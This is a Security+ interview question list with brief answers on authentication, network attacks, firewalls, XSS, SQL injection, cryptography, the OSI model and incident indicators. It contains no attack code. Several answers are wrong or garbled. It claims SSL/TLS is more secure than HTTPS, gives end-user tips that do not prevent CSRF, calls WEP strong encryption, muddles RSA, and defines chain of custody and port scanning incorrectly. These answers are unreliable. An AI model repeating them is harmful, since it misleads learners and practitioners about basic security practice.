Security+ interview questions
What is two-factor authentication and how can it be implemented for public websites?
2FA is also referred to as dual-factor authentication or two-step verification where the user provides two authentication factors for protecting both user credentials and resources while accessing. 2FA can be implemented on public websites such as Twitter, Microsoft, LinkedIn, and more for enabling another protection on your already protected account with a password For enabling 2FA, you can easily go to settings and then manage security settings
What is the difference between black hat, white hat, and grey hat hackers?
A Black-hat hacker is a person who tries to obtain unauthorized access into a system or a network to steal information for malicious purposes White-hat hackers are also known as ethical hackers; they are well-versed with ethical hacking tools, methodologies, and tactics for securing organization data. They try to detect and fix vulnerabilities and security holes in the systems. Many top companies recruit white hat hackers A grey hat hacker is a computer security expert who may violate ethical standards or rules sometimes, but do not have malicious intent of black hat hackers
What is a Botnet?
A Botnet is a group of internet-connected devices such as servers, PCs, mobile devices, etc., that are affected and controlled by malware. It is used for stealing data, sending spam, performing distributed denial-of-service attack (DDoS attack), and more and also to enable the user to access the device and it's connections
What is a DDoS attack and how can it be stopped/prevented?
A DDoS is a malicious attempt of disrupting regular traffic of a network by flooding with a large number of requests and making the server unavailable to the appropriate requests. The requests come from several unauthorized sources and hence called distributed denial of service attack
What is a cybersecurity risk assessment?
A cybersecurity risk assessment refers to detecting the information assets that are prone to cyber attacks (including customer data, hardware, laptop, etc.) and also evaluates various risks that could affect those assets It is mostly performed to identify, evaluate, and prioritize risks across organizations The best way to perform cybersecurity risk assessment is to detect: Relevant threats in your organization Internal and external vulnerabilities Evaluate vulnerabilities impact if they are exploited
What is the difference between a false positive and a false negative in IDS?
A false positive is a vulnerability is identified that doesn't really exist. A false alarm. Occurs when an IDS fires an alarm for legitimate network activity A false negative is when a vulnerability exists, but you didn't detect it. Considered to be the most complicated state. Occurs when IDS fails to identify malicious network traffic Compared to both, a false positive is more acceptable than false negatives as they lead to intrusions without being noticed
What is the use of a firewall and how can it be implemented?
A firewall is a security system used to control and monitor network traffic. It is used for protecting the system/network from malware, viruses, worms, etc. and secures unauthorized access from a private network The steps required to set up and configure the firewall are listed below: Change the default password for a firewall device Disable the remote administration feature Configure port forwarding for specific applications to function correctly such as an FTP server or a web server Firewall installation on a network with an existing DHCP server can cause errors unless its firewall's DHCP is disabled Make sure the firewall is configured to robust security policies
What is the three-way handshake?
A three-way handshake is used in TCP (Transmission Control Protocol) network for transmission of data in a reliable way between the host and the client It's called a three-way handshake because three segments are exchanged between the server and the client SYN The client wants to establish a connection with the server, and sends a segment with SYN (Synchronize Sequence Number) to the server if the server is up and has open ports SYN + ACK The server responds to the client request with SYN-ACK signal bit sets if it has open ports ACK The client acknowledges the response of a server and sends an ACK(Acknowledgement) packets back to the server
What is the use of a trace route?
A traceroute is a network diagnostic tool used for tracking the pathway of an IP network from source to destination. It records the period of each hop the packet makes while in route to its destination
What is the use of Address Resolution Protocol?
ARP is a protocol specifically used to map IP network addresses to physical addresses, such as ethernet addresses It translates 32-bits addresses to 48-bits addresses and vice versa. This is needed because the most common level of IP we use today is 32 bits long and MAC addresses are 48 bits long
What is active reconnaissance?
Active reconnaissance is a kind of computer attack where the intruder engages the target system for collecting the data about vulnerabilities The attackers mostly use port scanning to identify vulnerable ports then exploit the vulnerabilities of services associated with the open ports
How can identity theft be prevented?
Here's what you can do to prevent identity theft: Ensure strong and unique password Avoid sharing confidential information online, especially on social media Shop from known and trusted websites Use the latest version of the browsers Install advanced malware and spyware tools Use specialized security solutions against financial data Always update your system and the software Protect your SSN (Social Security Number)
What is the difference between information protection and information assurance?
Information protection Protects the data using encryption and security software from unauthorized sources Information assurance Keeps the data reliable by ensuring availability, authentication, confidentiality
How do you keep yourself updated with the latest cybersecurity news?
By following news websites and blogs from security experts Browser security related social media topics Check vulnerability alert feeds and advisory sites Attend cybersecurity live events
What is chain of custody?
Chain of custody refers to the probability of data provided as originally acquired and has not been changed before admission into evidence In legal terms, it's a chronological documentation/paper trail that records a proper sequence of custody, control, analysis, and disposition of electronic or physical evidence
What is port scanning?
Port scanning is an application designed for identifying open ports and services accessible on a host network. Security administrators mostly utilize it for exploiting vulnerabilities, and also by hackers for targeting victims Some of the most popular port scanning techniques are: Ping scan TCP connect TCP half-open Stealth scanning - NULL, FIN, X-MAS UDP
What is the difference between hashing and encryption?
Both hashing and encryption are used to convert readable data into an unreadable format. The significant difference is that encrypted data can be transformed into original data by decryption, whereas hashed data cannot be processed back to the original data
What are the techniques used in preventing a Brute Force Attack?
Brute Force Attack is a trial and error method that is employed for application programs to decode encrypted data such as data encryption keys or passwords using brute force rather than intellectual strategies Brute force attacks can be avoided by: Adding password complexity Include different formats of characters to make passwords stronger Limit login attempts Set a limit on login failures 2FA Add this layer of security to prevent brute force attacks
What is the CIA triad?
CIA (confidentiality, integrity, and availability) triad is a model designed to handle policies for information security within an organization Confidentiality: a collection of rules that limits access to information Integrity: assures the information is trustworthy, reliable, and hasn't been tampered with Availability: provides reliable access to data for authorized people
How do you prevent CSRF?
CSRF is referred to as Cross-Site Requested Forgery, where an attacker tricks a victim into performing actions on their behalf CSRF attacks can be prevented by: Employing the latest antivirus software which helps in blocking malicious scripts While authenticating to your banking site or performing any financial transactions on any other website, do not browser other sites or open any emails, which helps in executing malicious scripts while being authenticated to a financial site Never save your login/password within your browser for financial transactions Disable scripting in your browser
What is cognitive security?
Cognitive security is one of the applications of AI technologies that is used explicitly for identifying threats and protecting physical and digital systems based on human understanding processes Self learning security systems use pattern recognition, natural language processing, and data mining to mimic the human brain
What do you understand by compliance in cybersecurity?
Compliance means living by a set of standards set by organization/government/independent parties. It helps in defining and achieving IT targets and also in mitigating threats through processes like vulnerability management
What is Cross-Site Scripting and how can it be prevented?
Cross-Site Scripting is also known as a client-side injection attack, which aims at executing malicious scripts on a victim's web browser by injecting malicious code The following practices can prevent Cross-Site Scripting: Encoding special characters Using XSS HTML filters Validating user inputs Using Anti-XSS services/tools
What is cryptography?
Cryptography is a method to transform and transmit confidential data in an encoded way to protect the information from third parties for whom data is not authorized
What is cybersecurity?
Cybersecurity refers to the protection of internet-connected systems such as software, hardware, electronic data, etc., from cyber attacks. In a computing text, it is referred to as protection against unauthorized access.
What is the difference between Diffie-Hellman and RSA?
Diffie-Hellman - a key exchange protocol where 2 parties exchange a shared key that either one can use to encrypt/decrypt messages between them RSA - a asymmetric key encryption where it has 2 different keys. The public key can be given to anyone and decrypted with another, which is kept private
What is the need for DNS monitoring?
DNS (Domain Name System) is a service that is used for converting user-friendly domain names into a computer friendly IP address. It allows websites under a particular domain name which is easy to remember DNS monitoring is nothing but monitoring DNS records to ensure that it routes traffic properly to your website, electronic communication, services, and more
Define data leakage and its types
Data leakage - refers to the illegal transmission of data to an external destination or unauthorized entity within an organization. It can transfer data either physically or electronically. It usually occurs via the web, emails, and mobile data storage devices Types of data leakage: The accidental breach Majority of data leakage incidents are accidental. Ex. An entity may choose the wrong recipient while sending confidential data The disgruntled or ill-intentioned employee The authorized entity sends confidential data to an unauthorized body Electronic communications with malicious intent The problem is all the electronic mediums are capable of the file transferring and external access resources over the internet
What is the difference between hashing and salting?
Hashing is majorly used for authentication and is a one-way function where data is planned to a fixed-length value Salting is an extra step for hashing, where it adds additional value to passwords that change the hash value created
How do you protect data in transit vs. rest?
Definition of data Here data moves actively from one location to another across the internet or private network. Here data is not transferred from one location to another as data is stored on hard drives, flash drives, etc. Encryption in data protection It encrypts sensitive data before sending or using encrypted connections (SSL, HTTPS, TLS, etc.) it encrypts sensitive files before storing or choosing the encrypted storage drive itself
How do you prevent Man-in-the-middle attacks?
Have a stronger WAP/WEP encryption on wireless access points to avoid unauthorized users Use a VPN for a secure environment to protect sensitive information. It uses key-based encryption Public key pair based authentication must be used in various layers of a stack for ensuring whether you are communicating the right things or not HTTPS must be employed for securely communicating over HTTP through the public-private key exchange
What is forward secrecy and how does it work?
Forward secrecy is a feature of specific key agreement protocols which gives assurance that even if the private key of the server is compromised, the session keys will not be compromised. It is also known as perfect forward secrecy (PFS) The algorithm that helps in achieving this is called "Diffie-Hellman key exchange"
Explain system hardening
Generally, system hardening refers to a combination of tools and techniques for controlling vulnerabilities in systems, applications, firmware, and more in an organization The purpose of system hardening is to decrease the security risks by reducing the potential attacks and condensing the systems attack surface Various types of system hardening include: Database hardening Operating system hardening Application hardening Server hardening Network hardening
What is the difference between HIDS and NIDS?
HIDS(Host IDS) and NIDS(Network IDS) are both Intrusion Detection System and work for the same purpose i.e., to detect the intrusions. The only difference is that the HIDS is set up on a particular host/device. It monitors the traffic of a particular device and suspicious system activities. On the other hand, NIDS is set up on a network. It monitors traffic of all device of the network.
What are HTTP response code?
HTTP response codes display whether a particular HTTP request has been completed 1xx (Informational) The request has been received, and the process is continuing 2xx (Success) The request was successfully received and accepted 3xx (Redirection) Further action must be taken to complete it 4xx (Client Error) Request cannot be fulfilled or has incorrect syntax 5xx (Server Error) The server fails to fulfill the request
What is the difference between IDS and IPS?
Intrusion Detection Systems (IDS) - only detects intrusions but unable to prevent intrusions. It's a monitoring system It needs a human or another system to look at the results Intrusion Prevention Systems (IPS) - detects and prevents intrusions It's a control system It needs a regularly updated database with the latest threat data
List the common types of cybersecurity attacks
Malware SQL injection attack XSS DoS Man-in-the-middle attack Credential reuse Phishing Session hijacking
How often should you perform patch management?
Patch management should be done as soon as it is released. For windows, once the patch is released it should be applied to all machines, no later than one month. Same goes for network devices, patch it as soon as it is released. Proper patch management should be followed.
What is phishing and how can it be prevented?
Phishing is a malicious attempt of pretending oneself as an authorized entity in electronic communication for obtaining sensitive information such as usernames, passwords, etc. through fraudulent messages and emails Phishing can be prevented by: Using firewalls on your networks and systems Enable robust antivirus protection that has internet security Use 2FA authentication wherever possible Maintain adequate security Don't enter sensitive information such as financial or digital transaction details on the web pages that you don't trust Keep yourself updated with the latest phishing attempts
What is Remote Desktop protocol?
RDP is a Microsoft protocol specifically designed for application data transfer security and encryption between client devices, users, and virtual network server It allows administrators to remotely evaluate and resolve issues individual subscribers encounter It supports up to 64,000 separate data channels with a provision for multipoint transmission
What is the difference between the red team and blue team?
Red team and blue team refers to cyber warfare. Many organizations split the security team into two groups as red team and blue team. The red team refers to an attacker who exploits weaknesses in an organizations security The blue team refers to a defender who identifies and patches vulnerabilities into successful breaches
What is port blocking within LAN?
Restricting the users from accessing a set of services within the local area network is called port blocking. Stopping the source to not to access the destination node via ports. As the application works on the ports, so ports are blocked to restricts the access filling up the security holes in the network infrastructure.
What is SQL Injection and how can it be prevented?
SQL injection - type of code injection attack where it manages to execute malicious SQL statements to control a database server behind a web application. Attackers mostly use this to avoid application security measures and thereby access, modify, and delete, unauthorized data SQL injections can be prevented or mitigated by: Include prepared statements (with Parameterized Queries) Use stored procedures Validate user input Hide data from the error message Update your system Store database credentials separate and encrypted disable shell and any other functionalities you don't need
Which is more secure SSL/TLS or HTTPS?
SSL (Secure Sockets Layer)/ TLS (Transport Layer Security) is a security protocol which provides safer conversations between two or more parties across the internet. It works on top of the HTTP to provide security HTTPS (Hypertext Transfer Protocol Secure) is a combination of HTTP and SSL/TLS to provide a safer browsing experience with encryption in terms of security, SSL/TLS is more secure than HTTPS
what are salted hashes?
Salt is a random data. When a properly protected password system receives the new password, it creates a hash value of that password, a random salt value, and then the combined value is stored it its database. This helps to defend against dictionary attacks and known hash attacks
What is security misconfiguration?
Security misconfiguration is a vulnerability that could happen if an application/network/device is susceptible to attack due to an insecure configuration option. It can be as simple as keeping the default username/password unchanged
What is the difference between stored and reflected XSS?
Stored XSS attacks - the attacks where the injected scripts are stored on the target servers permanently. In this, the victim retrieves the malicious script from the server then requests the stored information Reflected XXS attacks - in this, the user has to send the request first, then it will start running on the victim's browser and reflects results from the browser to the user who sent the request
Symmetric vs. Asymmetric encryption?
Symmetric Encryption - uses a single key to encrypt and decrypt information Speed - symmetric encryption is faster Algorithms - AES, RC4, DES, Blowfish Purpose - preferred for transferring huge data Asymmetric encryption - uses a pair of public and private keys to encrypt and decrypt information Speed - asymmetric encryption performs slower compared to symmetric encryption Algorithms - Diffie-Hellman, RSA, ECC, and PGP Purpose - Mostly used for exchanging secret keys safely
What are the several indicators of compromise (IOC) that organizations should monitor?
The key indicators of compromise that organizations should monitor are: Unusual outbound network traffic HTML response sizes Geographical irregularities Increases in database read volume Log-in red flags Unexpected patching of systems Large numbers of requests for the same file Web traffic with unhuman behavior Suspicious registry or system file changes Unusual DNS requests Mobile device profile changes Bundles of data in the wrong place Mismatched port-application traffic Anomalies in privileged user account activity
What are the seven layers of the OSI model?
The main objective of the OSI model to process the communication between two endpoints in a network. The seven open systems interconnection layers are: Physical layer (layer 1) It transfers the computer bits from one device to another through the network. It also controls how physical connections are set up to the network and also bits represented into signals while transmitting either optically, electrically, or radio waves Data-link layer (layer 2) It handles the flow of data to and from a network. It also controls problems that occur due to bit transmission errors Network (layer 3) It used to transfer data to and from networks Transport layer (layer 4) It is used for sending data across a network and also offers error checking practices and data flow controls Session layer (layer 5) It determines the period of a system that waits for other applications to respond Presentation layer (layer 6) It manages encryption and decryption of data required for the application layer. It translates or formats data for the application layer based on the syntax of the application that accepts Application layer (layer 7) It allows users to communicate with network/application whenever required to perform network-related operations
what is the use of patch management?
The purpose of patch management is to keep updating various systems in a network and protect them against malware and hacking attacks. Many enterprises patch management tools manage the patching process by installing or deploying agents on a target computer, and they provide a link between centralized patch servers and computers to be patched
What is the difference between vulnerability assessment and penetration testing?
The terms vulnerability assessment and penetration testing are both different, but serve an essential function of protecting network environment. Vulnerability assessment: It's a process to define, detect, and prioritize the vulnerabilities in computer systems, network infrastructure, applications, etc., and gives the organization the required information to fix the flaws Penetration testing: it is also called pen testing or ethical hacking. It's a process of testing a network, system, application, etc. to identify vulnerabilities that attackers could exploit. In the context of web application security, it is most widely used to augment a web application firewall (WAF)
How do you reset or remove the BIOS password?
There are many ways to reset or remove the BIOS password: By removing CMOS battery By using software By using MS-DOS command By using motherboard jumper By using backdoor BIOD password
What is the difference between a threat, vulnerability, and a risk?
Threat - Someone/something with the potential to cause harm by damaging or destroying the official data to a system or organization. Ex: Phishing attack Vulnerability - refers to the weakness in a system that makes the threat outcomes more possible and even more dangerous. Ex. SQL injections, cross-site scripting Risk - refers to a combination of threat probability and impact/loss. In simple terms, it is related to potential damage or loss when threat exploits the vulnerability. Threat probability *Potential loss = Risk
What are the common methods of authentication for network security?
Token A token is used for accessing systems. It makes it more difficult for hackers to access accounts as they have long credentials Authentication A one time or password is used in processing online transactions through which they verify their identity Multifactor authentication A security system that needs more than one method of authentication Out-of-band authentication This authentication needs two different signals from two different channels or networks. It prevents most of the attacks from hacking and identity thefts in online banking
